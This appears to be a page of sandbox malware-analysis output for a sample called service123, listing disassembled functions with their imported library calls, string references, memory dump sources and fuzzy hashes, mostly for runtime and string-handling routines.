Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 5a486ffecdcaf301949818dc6d72f413fdd9af5c2eb7e86489d0e36c1bb3a61a
Instruction ID: 255274e36199d58d5889b686d1dbd22fd4f44a5523d4aa859b1699afb96eee5f
Opcode Fuzzy Hash: 5a486ffecdcaf301949818dc6d72f413fdd9af5c2eb7e86489d0e36c1bb3a61a
Instruction Fuzzy Hash: E621CDB0A093519FD340EF29D480A5EFBE4EF88658F45896EE5C8CB701E738C9448F82

Function 6C399530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C399549
_unlock.MSVCRT ref: 6C399571
calloc.MSVCRT ref: 6C3995BF

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 78d01098c4366bfc5f7453a8067a827aaeaa4e6a0fbada381f90fdf234b7cb3f
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 1D11F6715053118FEB40AF28C48069ABBE4EF85258F158AA9D89CCB745FB75D844CFA2

Function 6C390290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C3902BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3904DE), ref: 6C3902CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3904DE), ref: 6C390300

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: bf104b89aa48a292adeb1da297363d50efa3c1fb765911b38767121c3f592bc5
Instruction ID: 60ec14d90e8b04eb03847bf0e626f3ea42ce66f7a151de992a4f6104e37cbb41
Opcode Fuzzy Hash: bf104b89aa48a292adeb1da297363d50efa3c1fb765911b38767121c3f592bc5
Instruction Fuzzy Hash: 3DF0B77150D3419FDB10BFA9954935E7EB0BB46328F504A5CE0A987A98E77A44088F53

Function 00CB4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 00CB4C27
@, xrefs: 00CB4647

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 29aeb565445f8c26f4f41d2f8bece84eb02fb5bcbed7b9c4b4473d9fb611a2d4
Instruction ID: 44c164b747fe288826bf15bdfb2d56bf37d556f33676e8e254757706121a8c2f
Opcode Fuzzy Hash: 29aeb565445f8c26f4f41d2f8bece84eb02fb5bcbed7b9c4b4473d9fb611a2d4
Instruction Fuzzy Hash: F1A17C3160C3958BC7359F24C0907EBBBE1BB85714F148A1DE8E997242D735DA4ADB82

Function 6C3952CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 6C3952F7
@, xrefs: 6C394D17

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 744fcde06b4fe35efbe078473ae3e6c22513eb86566099f9b1ed327e3f6597d5
Instruction ID: ef0d5e9afd2781be7d53719548314e95ebce6fc3bbbc8ef2f075135db295e4cf
Opcode Fuzzy Hash: 744fcde06b4fe35efbe078473ae3e6c22513eb86566099f9b1ed327e3f6597d5
Instruction Fuzzy Hash: 78A18C7160C3558BD721DE25C09079ABBE5BB8630DF148A1DE8EC87741E736D94ACF82

Function 00CB1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00CB1C20
Unknown pseudo relocation protocol version %d., xrefs: 00CB1DF3
Unknown pseudo relocation bit size %d., xrefs: 00CB1C6D

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 600d578ba830bc4a6f6c2fd6d09e0296f9528db99c45b863364dabd0a1be5b53
Instruction ID: 0bea75bea4aaa5233a2fdfe59ed62741bcc18b4cc4559aa921ddcf0d44b7a6a0
Opcode Fuzzy Hash: 600d578ba830bc4a6f6c2fd6d09e0296f9528db99c45b863364dabd0a1be5b53
Instruction Fuzzy Hash: 8881C571A103058BCB10DF69E8A07DEBBF5FF84350F588929DCA9A7354E330E9158B92

Function 6C38A850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C38A970
Unknown pseudo relocation bit size %d., xrefs: 6C38A9BD
Unknown pseudo relocation protocol version %d., xrefs: 6C38AB43

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: d319471eaea912cfd71b8b3ca16bda5e086bc3d5eec1c9aba4c4fa3401044c91
Instruction ID: 73a54da0ec5a56d93f5cd2b039ec81a21799ca6a5ddbb5dfccb7b78c1efa3b8b
Opcode Fuzzy Hash: d319471eaea912cfd71b8b3ca16bda5e086bc3d5eec1c9aba4c4fa3401044c91
Instruction Fuzzy Hash: 9E718372A172598BCB10DF69C580B8EB7F4FF45308F158525D854A7B88D339E8458F92

Function 00CB80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00CB80F2
strchr.MSVCRT ref: 00CB8102
atoi.MSVCRT ref: 00CB8113

Strings

., xrefs: 00CB80F7

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 7948aa0b816e224c048af05aa255fc9f0bbc650a286b487cb8dca3e719c4d884
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: 9AE0E6719057014AD7407F3CC90635E75D96F40300F458C5CD4849B245DB79944ADB52

Function 6C399128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C399142
strchr.MSVCRT ref: 6C399152
atoi.MSVCRT ref: 6C399163

Strings

., xrefs: 6C399147

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction ID: c2373d2bdf7c9a32cff0f36cffd2001665d1dd268f31d3c9b893b2234ec2b553
Opcode Fuzzy Hash: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction Fuzzy Hash: ACE0ECB19047118EE7007F38C40939AB6E5BB81318F85886CD4CC97744F779D8499B93

Function 6C399293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C39929F
GetProcAddress.KERNEL32 ref: 6C3992B3

Strings

advapi32.dll, xrefs: 6C399298
SystemFunction036, xrefs: 6C3992A8

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: b695419fb87163565febc4629cbb4d6156f6c8ffea17511523d9f3de86c49d65
Instruction ID: 0328d939c9c6e1001692c4c2a6a41ff306887462e38e6efd7ba68a8ed9e2f469
Opcode Fuzzy Hash: b695419fb87163565febc4629cbb4d6156f6c8ffea17511523d9f3de86c49d65
Instruction Fuzzy Hash: A0E04FB28883008FCB00FF79950644ABFF0BA06324F00096AD08997608E3349018CF97

Function 6C391409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C3914D2

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 349151ea8046aa84804bb1f6c42905b91be77af3c5ce9e73def1af8669c826e1
Instruction ID: b252b44e26667d06e86edf8df569612d206dbf90f64575b3ac0706cf94fffda2
Opcode Fuzzy Hash: 349151ea8046aa84804bb1f6c42905b91be77af3c5ce9e73def1af8669c826e1
Instruction Fuzzy Hash: BE22FF75A097408FC720DF69C58465ABBE1BFC9348F118A2EE9D9A7710E735E844CF82

Function 6C419CD0 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C419D9C
memset.MSVCRT ref: 6C419DFE

Strings

xOFl0, xrefs: 6C419DA1, 6C419DBD
xOFl0, xrefs: 6C419FA4, 6C419FB0

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memset
String ID: xOFl0$xOFl0
API String ID: 2221118986-3474355564
Opcode ID: 6982524e9e93897dd194754659c1d6a32d035add259664a2cc71a646faffeadd
Instruction ID: 06c0d90c38deee3039696ce42190b6d86611405de9b847a90a9021c341456ac9
Opcode Fuzzy Hash: 6982524e9e93897dd194754659c1d6a32d035add259664a2cc71a646faffeadd
Instruction Fuzzy Hash: 09F14975609301CFC711DF29C580E6AB7F1FF8A719B69895CD8988BB10D732E90ACB91

Function 6C38A340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C38A3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C39C1CC), ref: 6C38A3E0
free.MSVCRT ref: 6C38A3EA

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: afc2f21a48d94f4bb73fe481d48725d0d55554b85ef1d6a8320812677badd892
Instruction ID: 2b41012478b9ec7f2db5afdb56da1cb3ef9cd7209504867a072c3c63b591bfa1
Opcode Fuzzy Hash: afc2f21a48d94f4bb73fe481d48725d0d55554b85ef1d6a8320812677badd892
Instruction Fuzzy Hash: 95316E7160B7118BDB009F2AD48471BBBE5EFC1758F210A2CDAE547B81E776C4458F92

Function 6C3D59F0 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3D5B24
memchr.MSVCRT ref: 6C3D5B43

Part of subcall function 6C4482D0: setlocale.MSVCRT ref: 6C4482E5

Strings

-, xrefs: 6C3D5D22
., xrefs: 6C3D5B35

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 67ba9516c4bc396ef4746844ba16902b2ac501305682f9add921d700bee7753a
Instruction ID: 67ce92a89a1f2822d47fec2dbd2063fb01ef8b94f19258656047773d556c818b
Opcode Fuzzy Hash: 67ba9516c4bc396ef4746844ba16902b2ac501305682f9add921d700bee7753a
Instruction Fuzzy Hash: 7BD105B19053198FCB00DFA8C48499EBBF1FF48314F158A6AE894AB751D734E945CF92

Function 6C3D5E30 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3D5F5E
memchr.MSVCRT ref: 6C3D5F7D

Part of subcall function 6C4482D0: setlocale.MSVCRT ref: 6C4482E5

Strings

6, xrefs: 6C3D6166
., xrefs: 6C3D5F6F

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: ba5466ad6fa2cd8524de6a3f93e05e4f0d8c5e6a89ea3232fde26240aef80e98
Instruction ID: 042b25a89ab0fb2491bc7738971d6a3a93ebfe25a6c530b35c85940118de65ca
Opcode Fuzzy Hash: ba5466ad6fa2cd8524de6a3f93e05e4f0d8c5e6a89ea3232fde26240aef80e98
Instruction Fuzzy Hash: F3D118B19093599FCB00DFA8C48098EBBF5EF48314F158A2AE8A4DB751D734E945CF92

Function 6C450D40 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C450D85

Strings

basic_string::append, xrefs: 6C450DFD, 6C450E09, 6C450EFC, 6C450FBC

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 476192ddfa6ddd609921a9c6ad51c9e161357547b4d6a089c2ad9cf5df841030
Instruction ID: cffc52ca52b29b786b72c9ebef12185b727bde90e7a4b7104ead07c3bc168412
Opcode Fuzzy Hash: 476192ddfa6ddd609921a9c6ad51c9e161357547b4d6a089c2ad9cf5df841030
Instruction Fuzzy Hash: 18A14775A042049FCB00EF29C584A9EBBF1FF89354F50896DE8988B744E734E859CF92

Function 6C3EB080 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C3E972F), ref: 6C3EB0E6
memcpy.MSVCRT(?,?,?,?,?,?,6C3E972F), ref: 6C3EB151
memcpy.MSVCRT(00000000,?,?,6C3E972F), ref: 6C3EB198

Strings

basic_string::assign, xrefs: 6C3EB1B3

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: a82dc878056734c576e2ca4460bdae28c7dae0fd45d493b7511bcc1f9c0568af
Instruction ID: 925438e14b992634915c82758e323ccfc938d1d974263a000646d2ad8241209f
Opcode Fuzzy Hash: a82dc878056734c576e2ca4460bdae28c7dae0fd45d493b7511bcc1f9c0568af
Instruction Fuzzy Hash: 32517B71B0A7218BDB01DF29C98465AF7E1FF8931CB50866ED4948B714E7319805CF86

Function 6C3F41C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C3F4221
memcpy.MSVCRT ref: 6C3F428F
memcpy.MSVCRT ref: 6C3F42C8

Strings

basic_string::assign, xrefs: 6C3F42E4

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: c8d3242295145252a35cd2c1003524c699c873b47aa6b88991496821571702ca
Instruction ID: 675981225a5e9ac2366e404df3692c60374b07fe09aea1b574349f097d250bea
Opcode Fuzzy Hash: c8d3242295145252a35cd2c1003524c699c873b47aa6b88991496821571702ca
Instruction Fuzzy Hash: DB517B71B0A6118FD710DF28D68461AFBF1AF86718F508D6EE4A48B714E371D806CF92

Function 6C3AE730 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3AE75A
wcslen.MSVCRT ref: 6C3AE7CA

Strings

basic_string: construction from null is not valid, xrefs: 6C3AE792, 6C3AE802, 6C3AE872

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
